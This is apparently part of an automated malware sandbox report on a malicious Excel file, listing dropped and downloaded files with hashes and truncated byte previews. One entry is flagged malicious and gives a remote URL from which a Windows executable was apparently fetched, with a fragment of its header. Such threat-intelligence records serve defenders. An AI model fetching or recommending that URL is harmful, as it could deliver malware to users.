SSDEEP:	1536:DWKaY5Se9WnVI78XvnoxJasJvRHKmyGDvDk0Rt9Y56l5ZMpvV05o9OX5xPw8:DWa0eQnVI7qCqZGDvDk4wol5w0EU
MD5:	B6FBFC6A40ED69565C2B1A2E4AABD201
SHA1:	432FF10BD10DB7494D0B2605DEA26C54F8238064
SHA-256:	A05711289E9F8DBA5F0CE5FE3B3096F8C181F537D169997E2DB30F83036052D3
SHA-512:	4BB5E232EFCD233ABA7804A8A3E3F901AFCD89CF82C94A93AE3E5FEDD2F3DE04CCF5A9F45CEC82D622F8A2740DE4B4CF7FA5155D60851C7C6E762A63CE70E909
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Joe Sandbox View:	Filename: document-69564892.xls, Detection: malicious, Browse Filename: document-1320073816.xls, Detection: malicious, Browse
IE Cache URL:	https://accesslinksgroup.com/ds/0104.gif
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......._W...6e..6e..6e.)v..6e...w..6e.Rich.6e.................PE..L.....f`...........!.....Z...........`.......p.......................................................................p..Q...P...d.......................................................................................P............................code...fY.......Z.................. ..`.data...Q....p.......^..............@..@.rdata.._L...........`...................data...P............x..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\6sxhavkE4_SZHA_K4rwWmg67vF0.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines
Category:	downloaded
Size (bytes):	20320
Entropy (8bit):	5.35616705330287
Encrypted:	false
SSDEEP:	384:Kh4xTJXiXZ4sb4ZENXjTDDoFWZ3BnqIfP5IDV6s4RKAvKXAL5Nuwbv++9O:YoTdiJpjBpBnqIH+Z6se4XALueO
MD5:	07F6B49331D0BD13597934A20FAC385B
SHA1:	B39E1439D7FC072AF4961D4AB6DE07D0BC64B986
SHA-256:	4752E030AC235C73E92EC8BBF124D9A32A424457CA9A6D6027A9595DA76F98D7
SHA-512:	333B12B6BC7F72156026829E820A4F24759E15973B474E2FFB264DEE4C50B0E478128255E416F3194E8C170A28DF02AA425D720CC5E15BC2382EA2D6D57A6F5B
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/6sxhavkE4_SZHA_K4rwWmg67vF0.gz.js
Preview:	/!DisableJavascriptProfiler/.var BM=BM\|\|{};BM.config={B:{timeout:250,delay:750,maxUrlLength:300,sendlimit:20,maxPayloadSize:14e3},V:{distance:20},N:{maxUrlLength:300},E:{buffer:30,timeout:5e3,maxUrlLength:300},C:{distance:10}},function(n){function vt(){if(!document.querySelector\|\|!document.querySelectorAll){k({FN:"init",S:"QuerySelector"});return}w={};e=[];ft=1;ut=0;rt=0;o=[];s=0;h=!1;var n=Math.floor(Math.random()*1e4).toString(36);t={P:{C:0,N:0,I:n,S:fi,M:r,T:0,K:r,F:0}};vi()}function ei(n,t){var r={};for(var i in n)i.indexOf("_")!==0&&(i in t&&(n[i]!==t[i]\|\|i==="i")?(r[i]=t[i],n[i]=t[i]):r[i]=null);return r}function oi(n){var i={};for(var t in n)n.hasOwnProperty(t)&&(i[t]=n[t]);return i}function b(n,t,r,u){if(!h){k({FN:"snapshot",S:n});return}r=r\|\|gt;t=t\|\|!1;var f=g()+r;ot(o,n)===-1&&o.push(n);t?(yt(),pt(t,u)):f>s&&(yt(),rt=sb_st(pt,r),s=f)}function k(n){var u={T:"CI.BoxModelError",FID:"CI",Name:ht,SV:ct,P:t&&"P"in t?d(t.P):r,TS:f(),ST:v},i,e;for(i in n)u[i]=n[i];e=d(u);wt(e)}func

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\JDHEvZVDnqsG9UcxzgIdtGb6thw.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	408
Entropy (8bit):	5.040387533075148
Encrypted:	false
SSDEEP:	12:2QWV6yRZ1nkDXAn357CXYX0cO2mAICL2b3TRn:2QO6P+5OYXJPi3TRn
MD5:	B4D53E840DB74C55CC3E3E6B44C3DAC1
SHA1:	89616D8595CF2D26B581287239AFB62655426315
SHA-256:	622B88D7D03DDACC92B81FE80A30B3D5A04072268BF9473BB29621E884AAB5F6
SHA-512:	4798E4E1E907EAE161E67B9BAB42206CE0F22530871EEC63582161E29DD00D2D7034E7D12CB3FE56FFF673BC9BB01F0646F9CA5DAED288134CB25978EFBBEC8F
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/JDHEvZVDnqsG9UcxzgIdtGb6thw.gz.js
Preview:	(function(){function u(){n&&(n.value.length>0?Lib.CssClass.add(sj_b,t):Lib.CssClass.remove(sj_b,t))}function f(r){n.value="";Lib.CssClass.remove(sj_b,t);sj_log("CI.XButton","Clicked","1");i&&Lib.CssClass.add(i,"b_focus");n.focus();n.click();r&&(r.preventDefault(),r.stopPropagation())}var i=_ge("b_header"),n=_ge("sb_form_q"),r=_ge("sb_clt"),t="b_sbText";n&&r&&(sj_be(r,"click",f),sj_be(n,"keyup",u),u())})()

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\NewErrorPageTemplate[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1310
Entropy (8bit):	4.810709096040597
Encrypted:	false
SSDEEP:	24:5Y0bn73pHIUZtJD0lFBohpZlJiHqw87xTeB0yVFaFG:5b73HJq0TJiHp89TOwU
MD5:	CDF81E591D9CBFB47A7F97A2BCDB70B9
SHA1:	8F12010DFAACDECAD77B70A3E781C707CF328496
SHA-256:	204D95C6FB161368C795BB63E538FE0B11F9E406494BB5758B3B0D60C5F651BD
SHA-512:	977DCC2C6488ACAF0E5970CEF1A7A72C9F9DC6BB82DA54F057E0853C8E939E4AB01B163EB7A5058E093A8BC44ECAD9D06880FDC883E67E28AC67FEE4D070A4CC
Malicious:	false
IE Cache URL:	res://ieframe.dll/NewErrorPageTemplate.css
Preview:	.body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #575757;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #2778ec;.. font-size: 38pt;.. font-weight: 300;.. vertical-align:bottom;.. margin-bottom: 20px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 40px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;.. padding-top: 5px;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsBu

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\urlblockindex[1].bin Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Category:	downloaded
Size (bytes):	16
Entropy (8bit):	1.6216407621868583
Encrypted:	false
SSDEEP:	3:PF/l:
MD5:	FA518E3DFAE8CA3A0E495460FD60C791
SHA1:	E4F30E49120657D37267C0162FD4A08934800C69
SHA-256:	775853600060162C4B4E5F883F9FD5A278E61C471B3EE1826396B6D129499AA7
SHA-512:	D21667F3FB081D39B579178E74E9BB1B6E9A97F2659029C165729A58F1787DC0ADADD980CD026C7A601D416665A81AC13A69E49A6A2FE2FDD0967938AA645C07
Malicious:	false
IE Cache URL:	https://r20swj13mr.microsoft.com/ieblocklist/v1/urlblockindex.bin
Preview:	.p.J2...........

C:\Users\user\AppData\Local\Temp\88CE0000 Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	86265
Entropy (8bit):	7.8969167607586295
Encrypted:	false
SSDEEP:	1536:BFlnA+3D5XUYz/wBf8orsEwHKynWLmArf7WtfHR1ijrvWf46rtvpnW:BLA+tDzPjEwqtD3Wt51ijKA6rtvpnW
MD5:	20D99E9ECD5C54BBEDCA4B30775F7227
SHA1:	A429581EB756DE918C9AC2A1DE477E10A1488DEE
SHA-256:	C499644DE8BD976A0245971D1A61D086C4C0A736C21DDB2176FBD6EE64ECA8FC
SHA-512:	7F654814422BD61A5452203EDFA58B3765BBF18ADB73881E05D72DEE52CBA239172B4375285CF371C431BC317860148C5A72A4F43F6E850CD486525A99EA9404
Malicious:	false
Preview:	...n.0.E.......D'...,g...&@....c.0_ .....eEm...t....4._m...1D.l...+..'.mj.......J..b.........c,....).K.h.@..GK++..$....A..A~>.]p.lB..5.b..W.Sq...;'KeYq../.j..k% .Q.l...t...(.x2$]E..dl........S.."....6{Le..\|.pE@..JFl.9TT..[..7...B^y;...60(.........7....^:.....0M,q#PW]b......FZ.e_..!u..w_g...>$../w.....\|.Fh..d3C....{p..z..nH.Oy......-G.}~\|.;...c.j..r=........>..h>....#>d..l..?>.{/4....uK.....t..i....#...O7.:jsu.I.CR8..C.l ..?..w.a>.$..l...........PK..........!....M....~.......[Content_Types].xml ...(.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\CabCFAF.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	Microsoft Cabinet archive data, 58596 bytes, 1 file
Category:	dropped
Size (bytes):	58596
Entropy (8bit):	7.995478615012125
Encrypted:	true
SSDEEP:	1536:J7r25qSSheImS2zyCvg3nB/QPsBbgwYkGrLMQ:F2qSSwIm1m/QEBbgb1oQ
MD5:	61A03D15CF62612F50B74867090DBE79
SHA1:	15228F34067B4B107E917BEBAF17CC7C3C1280A8
SHA-256:	F9E23DC21553DAA34C6EB778CD262831E466CE794F4BEA48150E8D70D3E6AF6D
SHA-512:	5FECE89CCBBF994E4F1E3EF89A502F25A72F359D445C034682758D26F01D9F3AA20A43010B9A87F2687DA7BA201476922AA46D4906D442D56EB59B2B881259D3
Malicious:	false
Preview:	MSCF............,...................I........T........bR. .authroot.stl...s~.4..CK..8T....c_.d....A.K......&.-.J...."Y...$E.KB..D...D.....3.n..u.............\|..=H4..c&.......f.,..=..-....p2.:..`HX......b.......Di.a......M.....4.....i..}..:~N.<..>..V..CX......B......,.q.M.....HB..E~Q...)..Gax../..}7..f......O0...x..k..ha...y.K.0.h..(....{2Y.].g...yw..\|0.+?.`-../.xvy..e......w.+^...w\|.Q.k.9&.Q.EzS.f......>?w.G.......v.F......A......-P.$.Y...u....Z..g..>.0&.y.(..<.].`>... ..R.q...g.Y..s.y.B..B....Z.4.<?.R....1.8.<.=.8..[a.s.......add..).NtX....r....R.&W4.5]....k.._iK..xzW.w.M.>,5.}..}.tLX5Ls3_..).!..X.~...%.B.....YS9m.,.....BV`.Cee.....?......:.x-.q9j...Yps..W...1.A<.X.O....7.ei..a\.~=X....HN.#....h,....y...\.br.8.y"k).....~B..v....GR.g\|.z..+.D8.m..F .h............ItNs.\....s..,.f`D...]..k...:9..lk.<D....u...........[...*.wY.O....P?.U.l....Fc.ObLq......Fvk..G9.8..!..\T:K`.......'.3......;.u..h...uD..^.bS...r........j..j .=...s .FxV....g.c.s..9.

C:\Users\user\AppData\Local\Temp\TarCFB0.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	152788
Entropy (8bit):	6.309740459389463
Encrypted:	false
SSDEEP:	1536:TIz6c7xcjgCyrYBZ5pimp4Ydm6Caku2Dnsz0JD8reJgMnl3rlMGGv:TNqccCymfdmoku2DMykMnNGG0
MD5:	4E0487E929ADBBA279FD752E7FB9A5C4
SHA1:	2497E03F42D2CBB4F4989E87E541B5BB27643536
SHA-256:	AE781E4F9625949F7B8A9445B8901958ADECE7E3B95AF344E2FCB24FE989EEB7
SHA-512:	787CBC262570A4FA23FD9C2BA6DA7B0D17609C67C3FD568246F9BEF2A138FA4EBCE2D76D7FD06C3C342B11D6D9BCD875D88C3DC450AE41441B6085B2E5D48C5A
Malicious:	false
Preview:	0..T....H.........T.0..T....1.0...`.H.e......0..D...+.....7.....D.0..D.0...+.....7..........\|h....210303062855Z0...+......0..D.0.......`...@.,..0..0.r1...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o.f.t. .R.o.o.t. .A.u.t.h.o

C:\Users\user\AppData\Local\Temp\~DF4926254C09A8051D.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	12933
Entropy (8bit):	1.3570396679531311
Encrypted:	false
SSDEEP:	48:LyNBGBPOvGvGyPmPOtqIt6GGPmPQtaDTg9gTTgXRgo:LyNgmvGJOGkIWO40SRh
MD5:	58BF75F56395903F53F0F5FC9BE8C216
SHA1:	E6202C5BEB00A1E12D1F248DD8BD6D11F50981C7
SHA-256:	059372010D6DAA0671500B7410EE7301016BF6D1E87DD25C2C1B796DC2D86796
SHA-512:	ECF1ADDF06BDC682CA083460DB264ABC9AD77AFE3404E09E2B42E52AF9368B7CCB4D3FE68592C2CC7EEB89EC8E7787849408C8F3D23DEACA6DD54050F9FAFA59
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ........................................i#5)................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF4B6B8A64AA9823FE.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	13109
Entropy (8bit):	0.98929534354532
Encrypted:	false
SSDEEP:	24:3NlLONlLrG8pNlIkNlIkNlo1qXNlo1cNlW1MaNja3Bm3o7kjkkkjjko:LyrGpvP1qI1R1MaNja3g38kjkkkjjko
MD5:	2B12E2D50820D0869232554603B78328
SHA1:	547F58E7A06C6D7908F17076430373514595D366
SHA-256:	1417A7777E2A238CACC8DDDBC3C4AB8A2E97806BAECA447E8300A0C8BE35547E
SHA-512:	7C3A238DF248D101AB7854D5A1C914A8C8F76DAF92929E39ECE3206418613930D0EB0A33244DE1EF37664B1EB6BD46941185AC1D829DC082AEF7D5FAA50F942B
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... .......................................P..=5)................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF54F36C8B63E1382B.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	39633
Entropy (8bit):	1.3790346213951485
Encrypted:	false
SSDEEP:	192:Ly3ve9jVCoICNq14Sv4mwIJysuH6uHquHK:Ly3ve9jV3ICNq14+49IJysRdz
MD5:	8837266B9157EA4B87F01B990F5F9E9C
SHA1:	D111568AD061EBFEE7D32ED6CCFBFBB2AC93D29C
SHA-256:	040779D819E14FB7A5AA30147CF16D6856290E32D203EE236E7857AD31A52BF9
SHA-512:	6756847A29FB80F69512CD44F34968862CB7E349FA0122125DDD4C2C4A11CEAB93117560BBFF2287A358E91045E809A5B6F65AF222BB363328B34004900B8406
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... .......................................0..=5)................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF5F1FA308145CBA72.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	29745
Entropy (8bit):	0.6919277508978947
Encrypted:	false
SSDEEP:	48:Ly2GLYvJM2xmxvM8wO7SaSKL7aspL7a2y:LyuvX4RwOSaSKL7lpL7a9
MD5:	E79D3129EAD79CD7E31E7AE647E07211
SHA1:	B398B387FE9E4D8E53AC8C343BD0720610A28B16
SHA-256:	51A419C53EC6714E117391B644E607487ED331F6C6997AD041155E7076AD75B2
SHA-512:	2A91A380566FB9EE1720BB8576C1A95986C0497F1F4A2AE69922B7AE2DAF3EB647BF89F35BB5DAEB1EC24DAD02145F5CA7A25DAC20BEF956FC1E16B2711FC6D7
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ..........................................M5)................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DF7FCBE7F3B2FEC721.TMP Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	data
Category:	dropped
Size (bytes):	52910
Entropy (8bit):	2.287535310815839
Encrypted:	false
SSDEEP:	384:LyKv49NVyq1e/eOMYs+dqgAuOgDXHIHfSHBLCgDXHIHphSg:tRo67o
MD5:	4250852E02458BE27C1991F0E58C2980
SHA1:	1CFC74DA230E8C9D3A4AD1346F7C40147757CAD6
SHA-256:	51CDA92A573A33B78A8BD57E42F0C95D428B16441712A7374948E3BC9A0BF16C
SHA-512:	67D2773EB4D21A2D18F39D82674E2E91F0B31EC781DEF1015FCF948E6867B263188947B60043AA7B1FDF9F29EDB43ED4B133DCC6105A61F76F23AB0142BC5249
Malicious:	false
Preview:	.............................%..H..M..{y..+.0...(................... ...............................................%..H..M..{y..+.0...(................... ....................................... ..$5)................K.j.j.a.q.f.a.j.N.2.c.0.u.z.g.v.1.l.4.q.y.5.n.f.W.e...........8.......................................................X......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Apr 4 08:28:36 2021, atime=Sun Apr 4 08:28:36 2021, length=8192, window=hide
Category:	dropped
Size (bytes):	867
Entropy (8bit):	4.479316095219766
Encrypted:	false
SSDEEP:	12:85Qo0LgXg/XAlCPCHaXgzB8IB/wB/vX+WnicvbLbDtZ3YilMMEpxRljKrcCTdJP8:851i/XTwz6IoYe7Dv3qSnrNru/
MD5:	10952164B3EF6840C509B688BC343C66
SHA1:	18BBD088D026F12B3E533850D89373202723D62D
SHA-256:	020731B5B73F6263D0878E98CE15703E734C97E558E4D994ACC142AC0638269A
SHA-512:	6E89BC6C1DB6104F121E891A75B1194CBFA4AEDACBFF79E7EFC72EAD735CC1D65F0663F45F1330C505FAF4C822098D140EC661892B9C5604B4DE97AEB654033C
Malicious:	false
Preview:	L..................F...........7G..y...4)..y...4)... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......R.K..Desktop.d......QK.X.R.K..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N...W...9r.[........}EkD_....3N...W...9r.[.*.......}Ek....

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1370071295.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:13 2020, mtime=Sun Apr 4 08:28:36 2021, atime=Sun Apr 4 08:28:36 2021, length=185344, window=hide
Category:	dropped
Size (bytes):	2118
Entropy (8bit):	4.532934181499579
Encrypted:	false
SSDEEP:	24:8xjI/XTwz6Ikn62NeskDv3qSndM7dD2xjI/XTwz6Ikn62NeskDv3qSndM7dV:81I/XT3Ik6gnLWQh21I/XT3Ik6gnLWQ/
MD5:	116767A0F68A6828358B73147BB44EEA
SHA1:	C53EBFB07F71AD147F879B5C5474BA9B17392BFA
SHA-256:	E935B68D7AACFC6FFA199B0CBCAFDBD20A54E0D1E0C4525333533F7DDE8005B4
SHA-512:	D046AB3984C7CA2D3908D4AFAC07279DFAE6F7132058AC0B665D55EF1C44C21A63EB97C76E045543F7DFE4EFAA02943B48403B8E39A561BC7F8DF54F0057B17A
Malicious:	false
Preview:	L..................F.... ...T.&..{..y...4)..Zk..4)...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2......R.K .DOCUME~1.XLS..\.......Q.y.Q.y...8.....................d.o.c.u.m.e.n.t.-.1.3.7.0.0.7.1.2.9.5...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\320946\Users.user\Desktop\document-1370071295.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.3.7.0.0.7.1.2.9.5...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......320946..........D_....3N.

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	110
Entropy (8bit):	4.785340227252118
Encrypted:	false
SSDEEP:	3:oyBVomMY9LR3M26YCZELR3M26YCmMY9LR3M26YCv:dj6Y9LFfgELFfUY9LFfs
MD5:	A500F923EDBFE547DF60A273D18D53CF
SHA1:	2E619B40C653D1C60A59890F30B9165C4375DE5D
SHA-256:	7F095020B0CAE949F306A4A3935C7E244735D41344854EE9AB92EA7FC855FBE0
SHA-512:	03B190A3E25CA11AEB708C77C3F80FDF41364BE73E9212D5E373F107891DE65A7151CD269DA1C4C2B793A368DA388CFC7B910DC3E784787F966D1C87C6404B5C
Malicious:	false
Preview:	Desktop.LNK=0..[xls]..document-1370071295.LNK=0..document-1370071295.LNK=0..[xls]..document-1370071295.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4EGO8ZMQ.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	94
Entropy (8bit):	4.324878173925661
Encrypted:	false
SSDEEP:	3:eGp5bR4XgVBUVXJUOHjW2GWdRz:LLt4NVXDjuWTz
MD5:	07EE4D3B51CEBFC3C682A3218571922A
SHA1:	845CAE945DA27308880DC92248D97ABD7B001DA5
SHA-256:	76D39F53596F1BE53781EDFFCC5D6D65DEE9DF353374AF209B12AE35B0498464
SHA-512:	B3F7A9700CA72F7324AD027A175047375BB0BFCD9CACE6BEFFAF4AEE21F1C25442878AFFD63386FC82EC085AC7211C8FA69137B3F4A113DD9EFF58B068CD7A0F
Malicious:	false
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\EM0AF430.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	347
Entropy (8bit):	4.71724974832748
Encrypted:	false
SSDEEP:	6:LLt4NVXDjuWTZ6zMgXUjuWT11aOW3ooVXDjuWT11a5AHisl6Xi1tQAVXDjuWT11o:N4N9DjtdgXUjt11Pdo9Djt11Nisl6tAU
MD5:	0384AD573DCFD2FC30E961E4C9800AD9
SHA1:	0BFD064E0973F334EB866B0F5C957B96170C9D9C
SHA-256:	F83F0268FEB8743B6E34E89BFD4D501B77EAE3604A8B5D133443BCA4636BC1D3
SHA-512:	BC49BA2EC7677A2B30D936315E15D0D3B2E0740F73151DC3340F51DD3245B008D178D0073B07B45BF04B969B11AF27B5F1FFF97123DBE6474ADAF10BBF761989
Malicious:	false
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.._EDGE_V.1.bing.com/.9216.1497582336.30956384.615343783.30878005..SRCHD.AF=NOFORM.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUID.V=2&GUID=45FEC09314464B06A21529DFD3D0A2CE&dmnchg=1.bing.com/.1024.1497582336.30956384.615343783.30878005..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\LHCYDYR3.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	232
Entropy (8bit):	4.562967448410149
Encrypted:	false
SSDEEP:	6:LLt4NVXDjuWTZ6zMgXUjuWT11aOW3ooVXDjuWT11o:N4N9DjtdgXUjt11Pdo9Djt11o
MD5:	D9F07AE8BA8C29E0E6234881C49364AA
SHA1:	BC29789DB48FBF6DF31008C462405FD522A18C42
SHA-256:	D92C644BB6F0374A219693122AD4E651301D4294FBDCD6612F26E7C03748A229
SHA-512:	9D64D7EAF4849EC89DEC9C4D9E77AD1518C87723E64B4A54A97F2F330F723729BCD2981BAFF8B366B5DF01D9D281EBD8BDAF5AE65D0DB1B148DCDC2EEE864F96
Malicious:	false
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.._EDGE_V.1.bing.com/.9216.1497582336.30956384.615343783.30878005..SRCHD.AF=NOFORM.bing.com/.1024.1497582336.30956384.615343783.30878005.*.

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\LOCDN06X.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	521
Entropy (8bit):	4.760800440903748
Encrypted:	false
SSDEEP:	12:N4N9DjtdgXUjt11Pdo9Djt11Nisl6tA9Djt11qjLtbQHg9Djtx/o:QjHSUjb1PKjb1tl6tMjb1qJfj7o
MD5:	1E53F5BEE87A0438D28F6E4FBDB0AF57
SHA1:	82B8331854C11B29BCD780E09835D1F16F082A62
SHA-256:	A8CFF27564DE42CE33135F1D0504B430A1FE51CE755B122554B0E653561471CD
SHA-512:	23510804CC317ECFC6572992C3B3AE52269C07B4645D6E1713ED4B5E1661A2D79A58F6690B923BCBB28E390D669486DD0F5CD59111322540E90CDAA461E9C782
Malicious:	false
Preview:	MUID.099651EE0C2061E9079E41E10DF7608B.bing.com/.1024.1497582336.30956384.615187782.30878005.._EDGE_V.1.bing.com/.9216.1497582336.30956384.615343783.30878005..SRCHD.AF=NOFORM.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUID.V=2&GUID=45FEC09314464B06A21529DFD3D0A2CE&dmnchg=1.bing.com/.1024.1497582336.30956384.615343783.30878005..SRCHUSR.DOB=20210404&T=1617496238000.bing.com/.1088.3255035136.30956459.625352800.30878005..SRCHHPGUSR.SRCHLANGV2=en.bing.com/.1024.1497582336.30956384.615499783.30878005..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\N0NSTJUS.txt Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	505
Entropy (8bit):	4.764590622138121
Encrypted:	false
